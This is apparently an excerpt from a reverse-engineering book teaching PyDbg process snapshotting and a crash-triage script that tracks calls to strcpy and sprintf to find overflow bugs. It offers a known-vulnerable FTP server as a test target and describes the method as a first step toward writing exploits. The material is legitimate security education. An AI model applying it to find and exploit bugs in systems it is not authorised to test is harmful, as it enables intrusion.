PyDbg comes stocked with a very cool feature called process snapshotting. Using process snapshotting you are able to freeze a process, obtain all of its memory, and resume the process. At any later point you can revert the process to the point where the snapshot was taken. This can be quite handy when reverse engineering a binary or analyzing a crash.
Our first step is to get an accurate picture of what the target process was up to at a precise moment. In order for the picture to be accurate, we need to first obtain all threads and their respective CPU contexts. As well, we need to obtain all of the process's memory pages and their contents. Once we have this information, it's just a matter of storing it for when we want to restore a snapshot.
Before we can take the process snapshots, we have to suspend all threads of
execution so that they don't change data or state while the snapshot
is being taken. To suspend all threads in PyDbg, we use
suspend_all_threads()
, and to resume all the
threads, we use the aptly named
resume_all_threads()
. Once we have suspended the
threads, we simply make a call to
process_snapshot()
. This automatically fetches all
of the contextual information about each thread and all memory at that
precise moment. Once the snapshot is finished, we resume all of the
threads. When we want to restore the process to the snapshot point, we
suspend all of the threads, call process_restore()
,
and resume all of the threads. Once we resume the process, we should
be back at our original snapshot point. Pretty neat, eh?
To try this out, let's use a simple example where we allow a user to hit a key to take a snapshot and hit a key again to restore the snapshot. Open a new Python file, call it snapshot.py, and enter the following code.
from pydbg import * from pydbg.defines import * import threading import time import sys class snapshotter(object): def __init__(self,exe_path): self.exe_path = exe_path self.pid = None self.dbg = None self.running = True# Start the debugger thread, and loop until it sets the PID # of our target process pydbg_thread = threading.Thread(target=self.start_debugger) pydbg_thread.setDaemon(0) pydbg_thread.start() while self.pid == None: time.sleep(1)
# We now have a PID and the target is running; let's get a # second thread running to do the snapshots monitor_thread = threading.Thread(target=self.monitor_debugger) monitor_thread.setDaemon(0) monitor_thread.start()
def monitor_debugger(self): while self.running == True: input = raw_input("Enter: 'snap','restore' or 'quit'") input = input.lower().strip() if input == "quit": print "[*] Exiting the snapshotter." self.running = False self.dbg.terminate_process() elif input == "snap": print "[*] Suspending all threads." self.dbg.suspend_all_threads() print "[*] Obtaining snapshot." self.dbg.process_snapshot() print "[*] Resuming operation." self.dbg.resume_all_threads() elif input == "restore": print "[*] Suspending all threads." self.dbg.suspend_all_threads() print "[*] Restoring snapshot." self.dbg.process_restore() print "[*] Resuming operation." self.dbg.resume_all_threads()
def start_debugger(self): self.dbg = pydbg() pid = self.dbg.load(self.exe_path) self.pid = self.dbg.pid self.dbg.run()
exe_path = "C:\\WINDOWS\\System32\\calc.exe" snapshotter(exe_path)
So the first step is to start the target application under a
debugger thread. By using separate threads, we can enter
snapshotting commands without forcing the target application to
pause while it waits for our input. Once the debugger thread has
returned a valid PID
, we start up a new thread that will take our
input
. Then when we send it a command, it will
evaluate whether we are taking a snapshot, restoring a snapshot, or
quitting
—pretty straightforward. The reason I picked
Calculator as an example application
is that we can actually see this snapshotting
process in action. Enter a bunch of random math operations into the
calculator, enter
snap
into our Python
script, and then do some more math or hit the Clear button. Then
simply type restore
into our Python script,
and you should see the numbers revert to our original snapshot
point! Using this technique you can walk through and rewind certain
parts of a process that are of interest without having to restart
the process and get it to that exact state again. Now let's combine
some of our new PyDbg techniques to create a fuzzing assistance
tool that will help us find vulnerabilities in
software applications and automate crash handling.
Now that we have covered some of the most useful features of PyDbg, we will build a utility program to help root out (pun intended) exploitable flaws in software applications. Certain function calls are more prone to buffer overflows, format string vulnerabilities, and memory corruption. We want to pay particular attention to these dangerous functions.
The tool will locate the dangerous function calls and track hits to those functions. When a function that we deemed to be dangerous gets called, we will dereference four parameters off the stack (as well as the return address of the caller) and snapshot the process in case that function causes an overflow condition. If there is an access violation, our script will rewind the process to the last dangerous function hit. From there it single-steps the target application and disassembles each instruction until we either throw the access violation again or hit the maximum number of instructions we want to inspect. Anytime you see a hit on a dangerous function that matches data you have sent to the application, it is worth taking a look at whether you can manipulate the data to crash the application. This is the first step toward creating an exploit.
Warm up your coding fingers, open a new Python script called danger_track.py, and enter the following code.
from pydbg import * from pydbg.defines import * import utils # This is the maximum number of instructions we will log # after an access violation MAX_INSTRUCTIONS = 10 # This is far from an exhaustive list; add more for bonus points dangerous_functions = { "strcpy" : "msvcrt.dll", "strncpy" : "msvcrt.dll", "sprintf" : "msvcrt.dll", "vsprintf": "msvcrt.dll" } dangerous_functions_resolved = {} crash_encountered = False instruction_count = 0 def danger_handler(dbg): # We want to print out the contents of the stack; that's about it # Generally there are only going to be a few parameters, so we will # take everything from ESP to ESP+20, which should give us enough # information to determine if we own any of the data esp_offset = 0 print "[*] Hit %s" % dangerous_functions_resolved[dbg.context.Eip] print "=================================================================" while esp_offset <= 20: parameter = dbg.smart_dereference(dbg.context.Esp + esp_offset) print "[ESP + %d] => %s" % (esp_offset, parameter) esp_offset += 4 print "=================================================================\n" dbg.suspend_all_threads() dbg.process_snapshot() dbg.resume_all_threads() return DBG_CONTINUE def access_violation_handler(dbg): global crash_encountered # Something bad happened, which means something good happened :) # Let's handle the access violation and then restore the process # back to the last dangerous function that was called if dbg.dbg.u.Exception.dwFirstChance: return DBG_EXCEPTION_NOT_HANDLED crash_bin = utils.crash_binning.crash_binning() crash_bin.record_crash(dbg) print crash_bin.crash_synopsis() if crash_encountered == False: dbg.suspend_all_threads() dbg.process_restore() crash_encountered = True # We flag each thread to single step for thread_id in dbg.enumerate_threads(): print "[*] Setting single step for thread: 0x%08x" % thread_id h_thread = dbg.open_thread(thread_id) dbg.single_step(True, h_thread) dbg.close_handle(h_thread) # Now resume execution, which will pass control to our # single step handler dbg.resume_all_threads() return DBG_CONTINUE else: dbg.terminate_process() return DBG_EXCEPTION_NOT_HANDLED def single_step_handler(dbg): global instruction_count global crash_encountered if crash_encountered: if instruction_count == MAX_INSTRUCTIONS: dbg.single_step(False) return DBG_CONTINUE else: # Disassemble this instruction instruction = dbg.disasm(dbg.context.Eip) print "#%d\t0x%08x : %s" % (instruction_count,dbg.context.Eip, instruction) instruction_count += 1 dbg.single_step(True) return DBG_CONTINUE dbg = pydbg() pid = int(raw_input("Enter the PID you wish to monitor: ")) dbg.attach(pid) # Track down all of the dangerous functions and set breakpoints for func in dangerous_functions.keys(): func_address = dbg.func_resolve( dangerous_functions[func],func ) print "[*] Resolved breakpoint: %s -> 0x%08x" % ( func, func_address ) dbg.bp_set( func_address, handler = danger_handler ) dangerous_functions_resolved[func_address] = func dbg.set_callback( EXCEPTION_ACCESS_VIOLATION, access_violation_handler ) dbg.set_callback( EXCEPTION_SINGLE_STEP, single_step_handler ) dbg.run()
There should be no big surprises in the preceding code block, as we have covered most of the concepts in our previous PyDbg endeavors. The best way to test the effectiveness of this script is to pick a software application that is known to have a vulnerability,[26] attach the script, and then send the required input to crash the application.
We have taken a solid tour of PyDbg and a subset of the features it provides. As you can see, the ability to script a debugger is extremely powerful and lends itself well to automation tasks. The only downside to this method is that for every piece of information you wish to obtain, you have to write code to do it. This is where our next tool, Immunity Debugger, bridges the gap between a scripted debugger and a graphical debugger you can interact with. Let's carry on.
[26] A classic stack-based overflow can be found in WarFTPD 1.65. You can still download this FTP server from http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=1.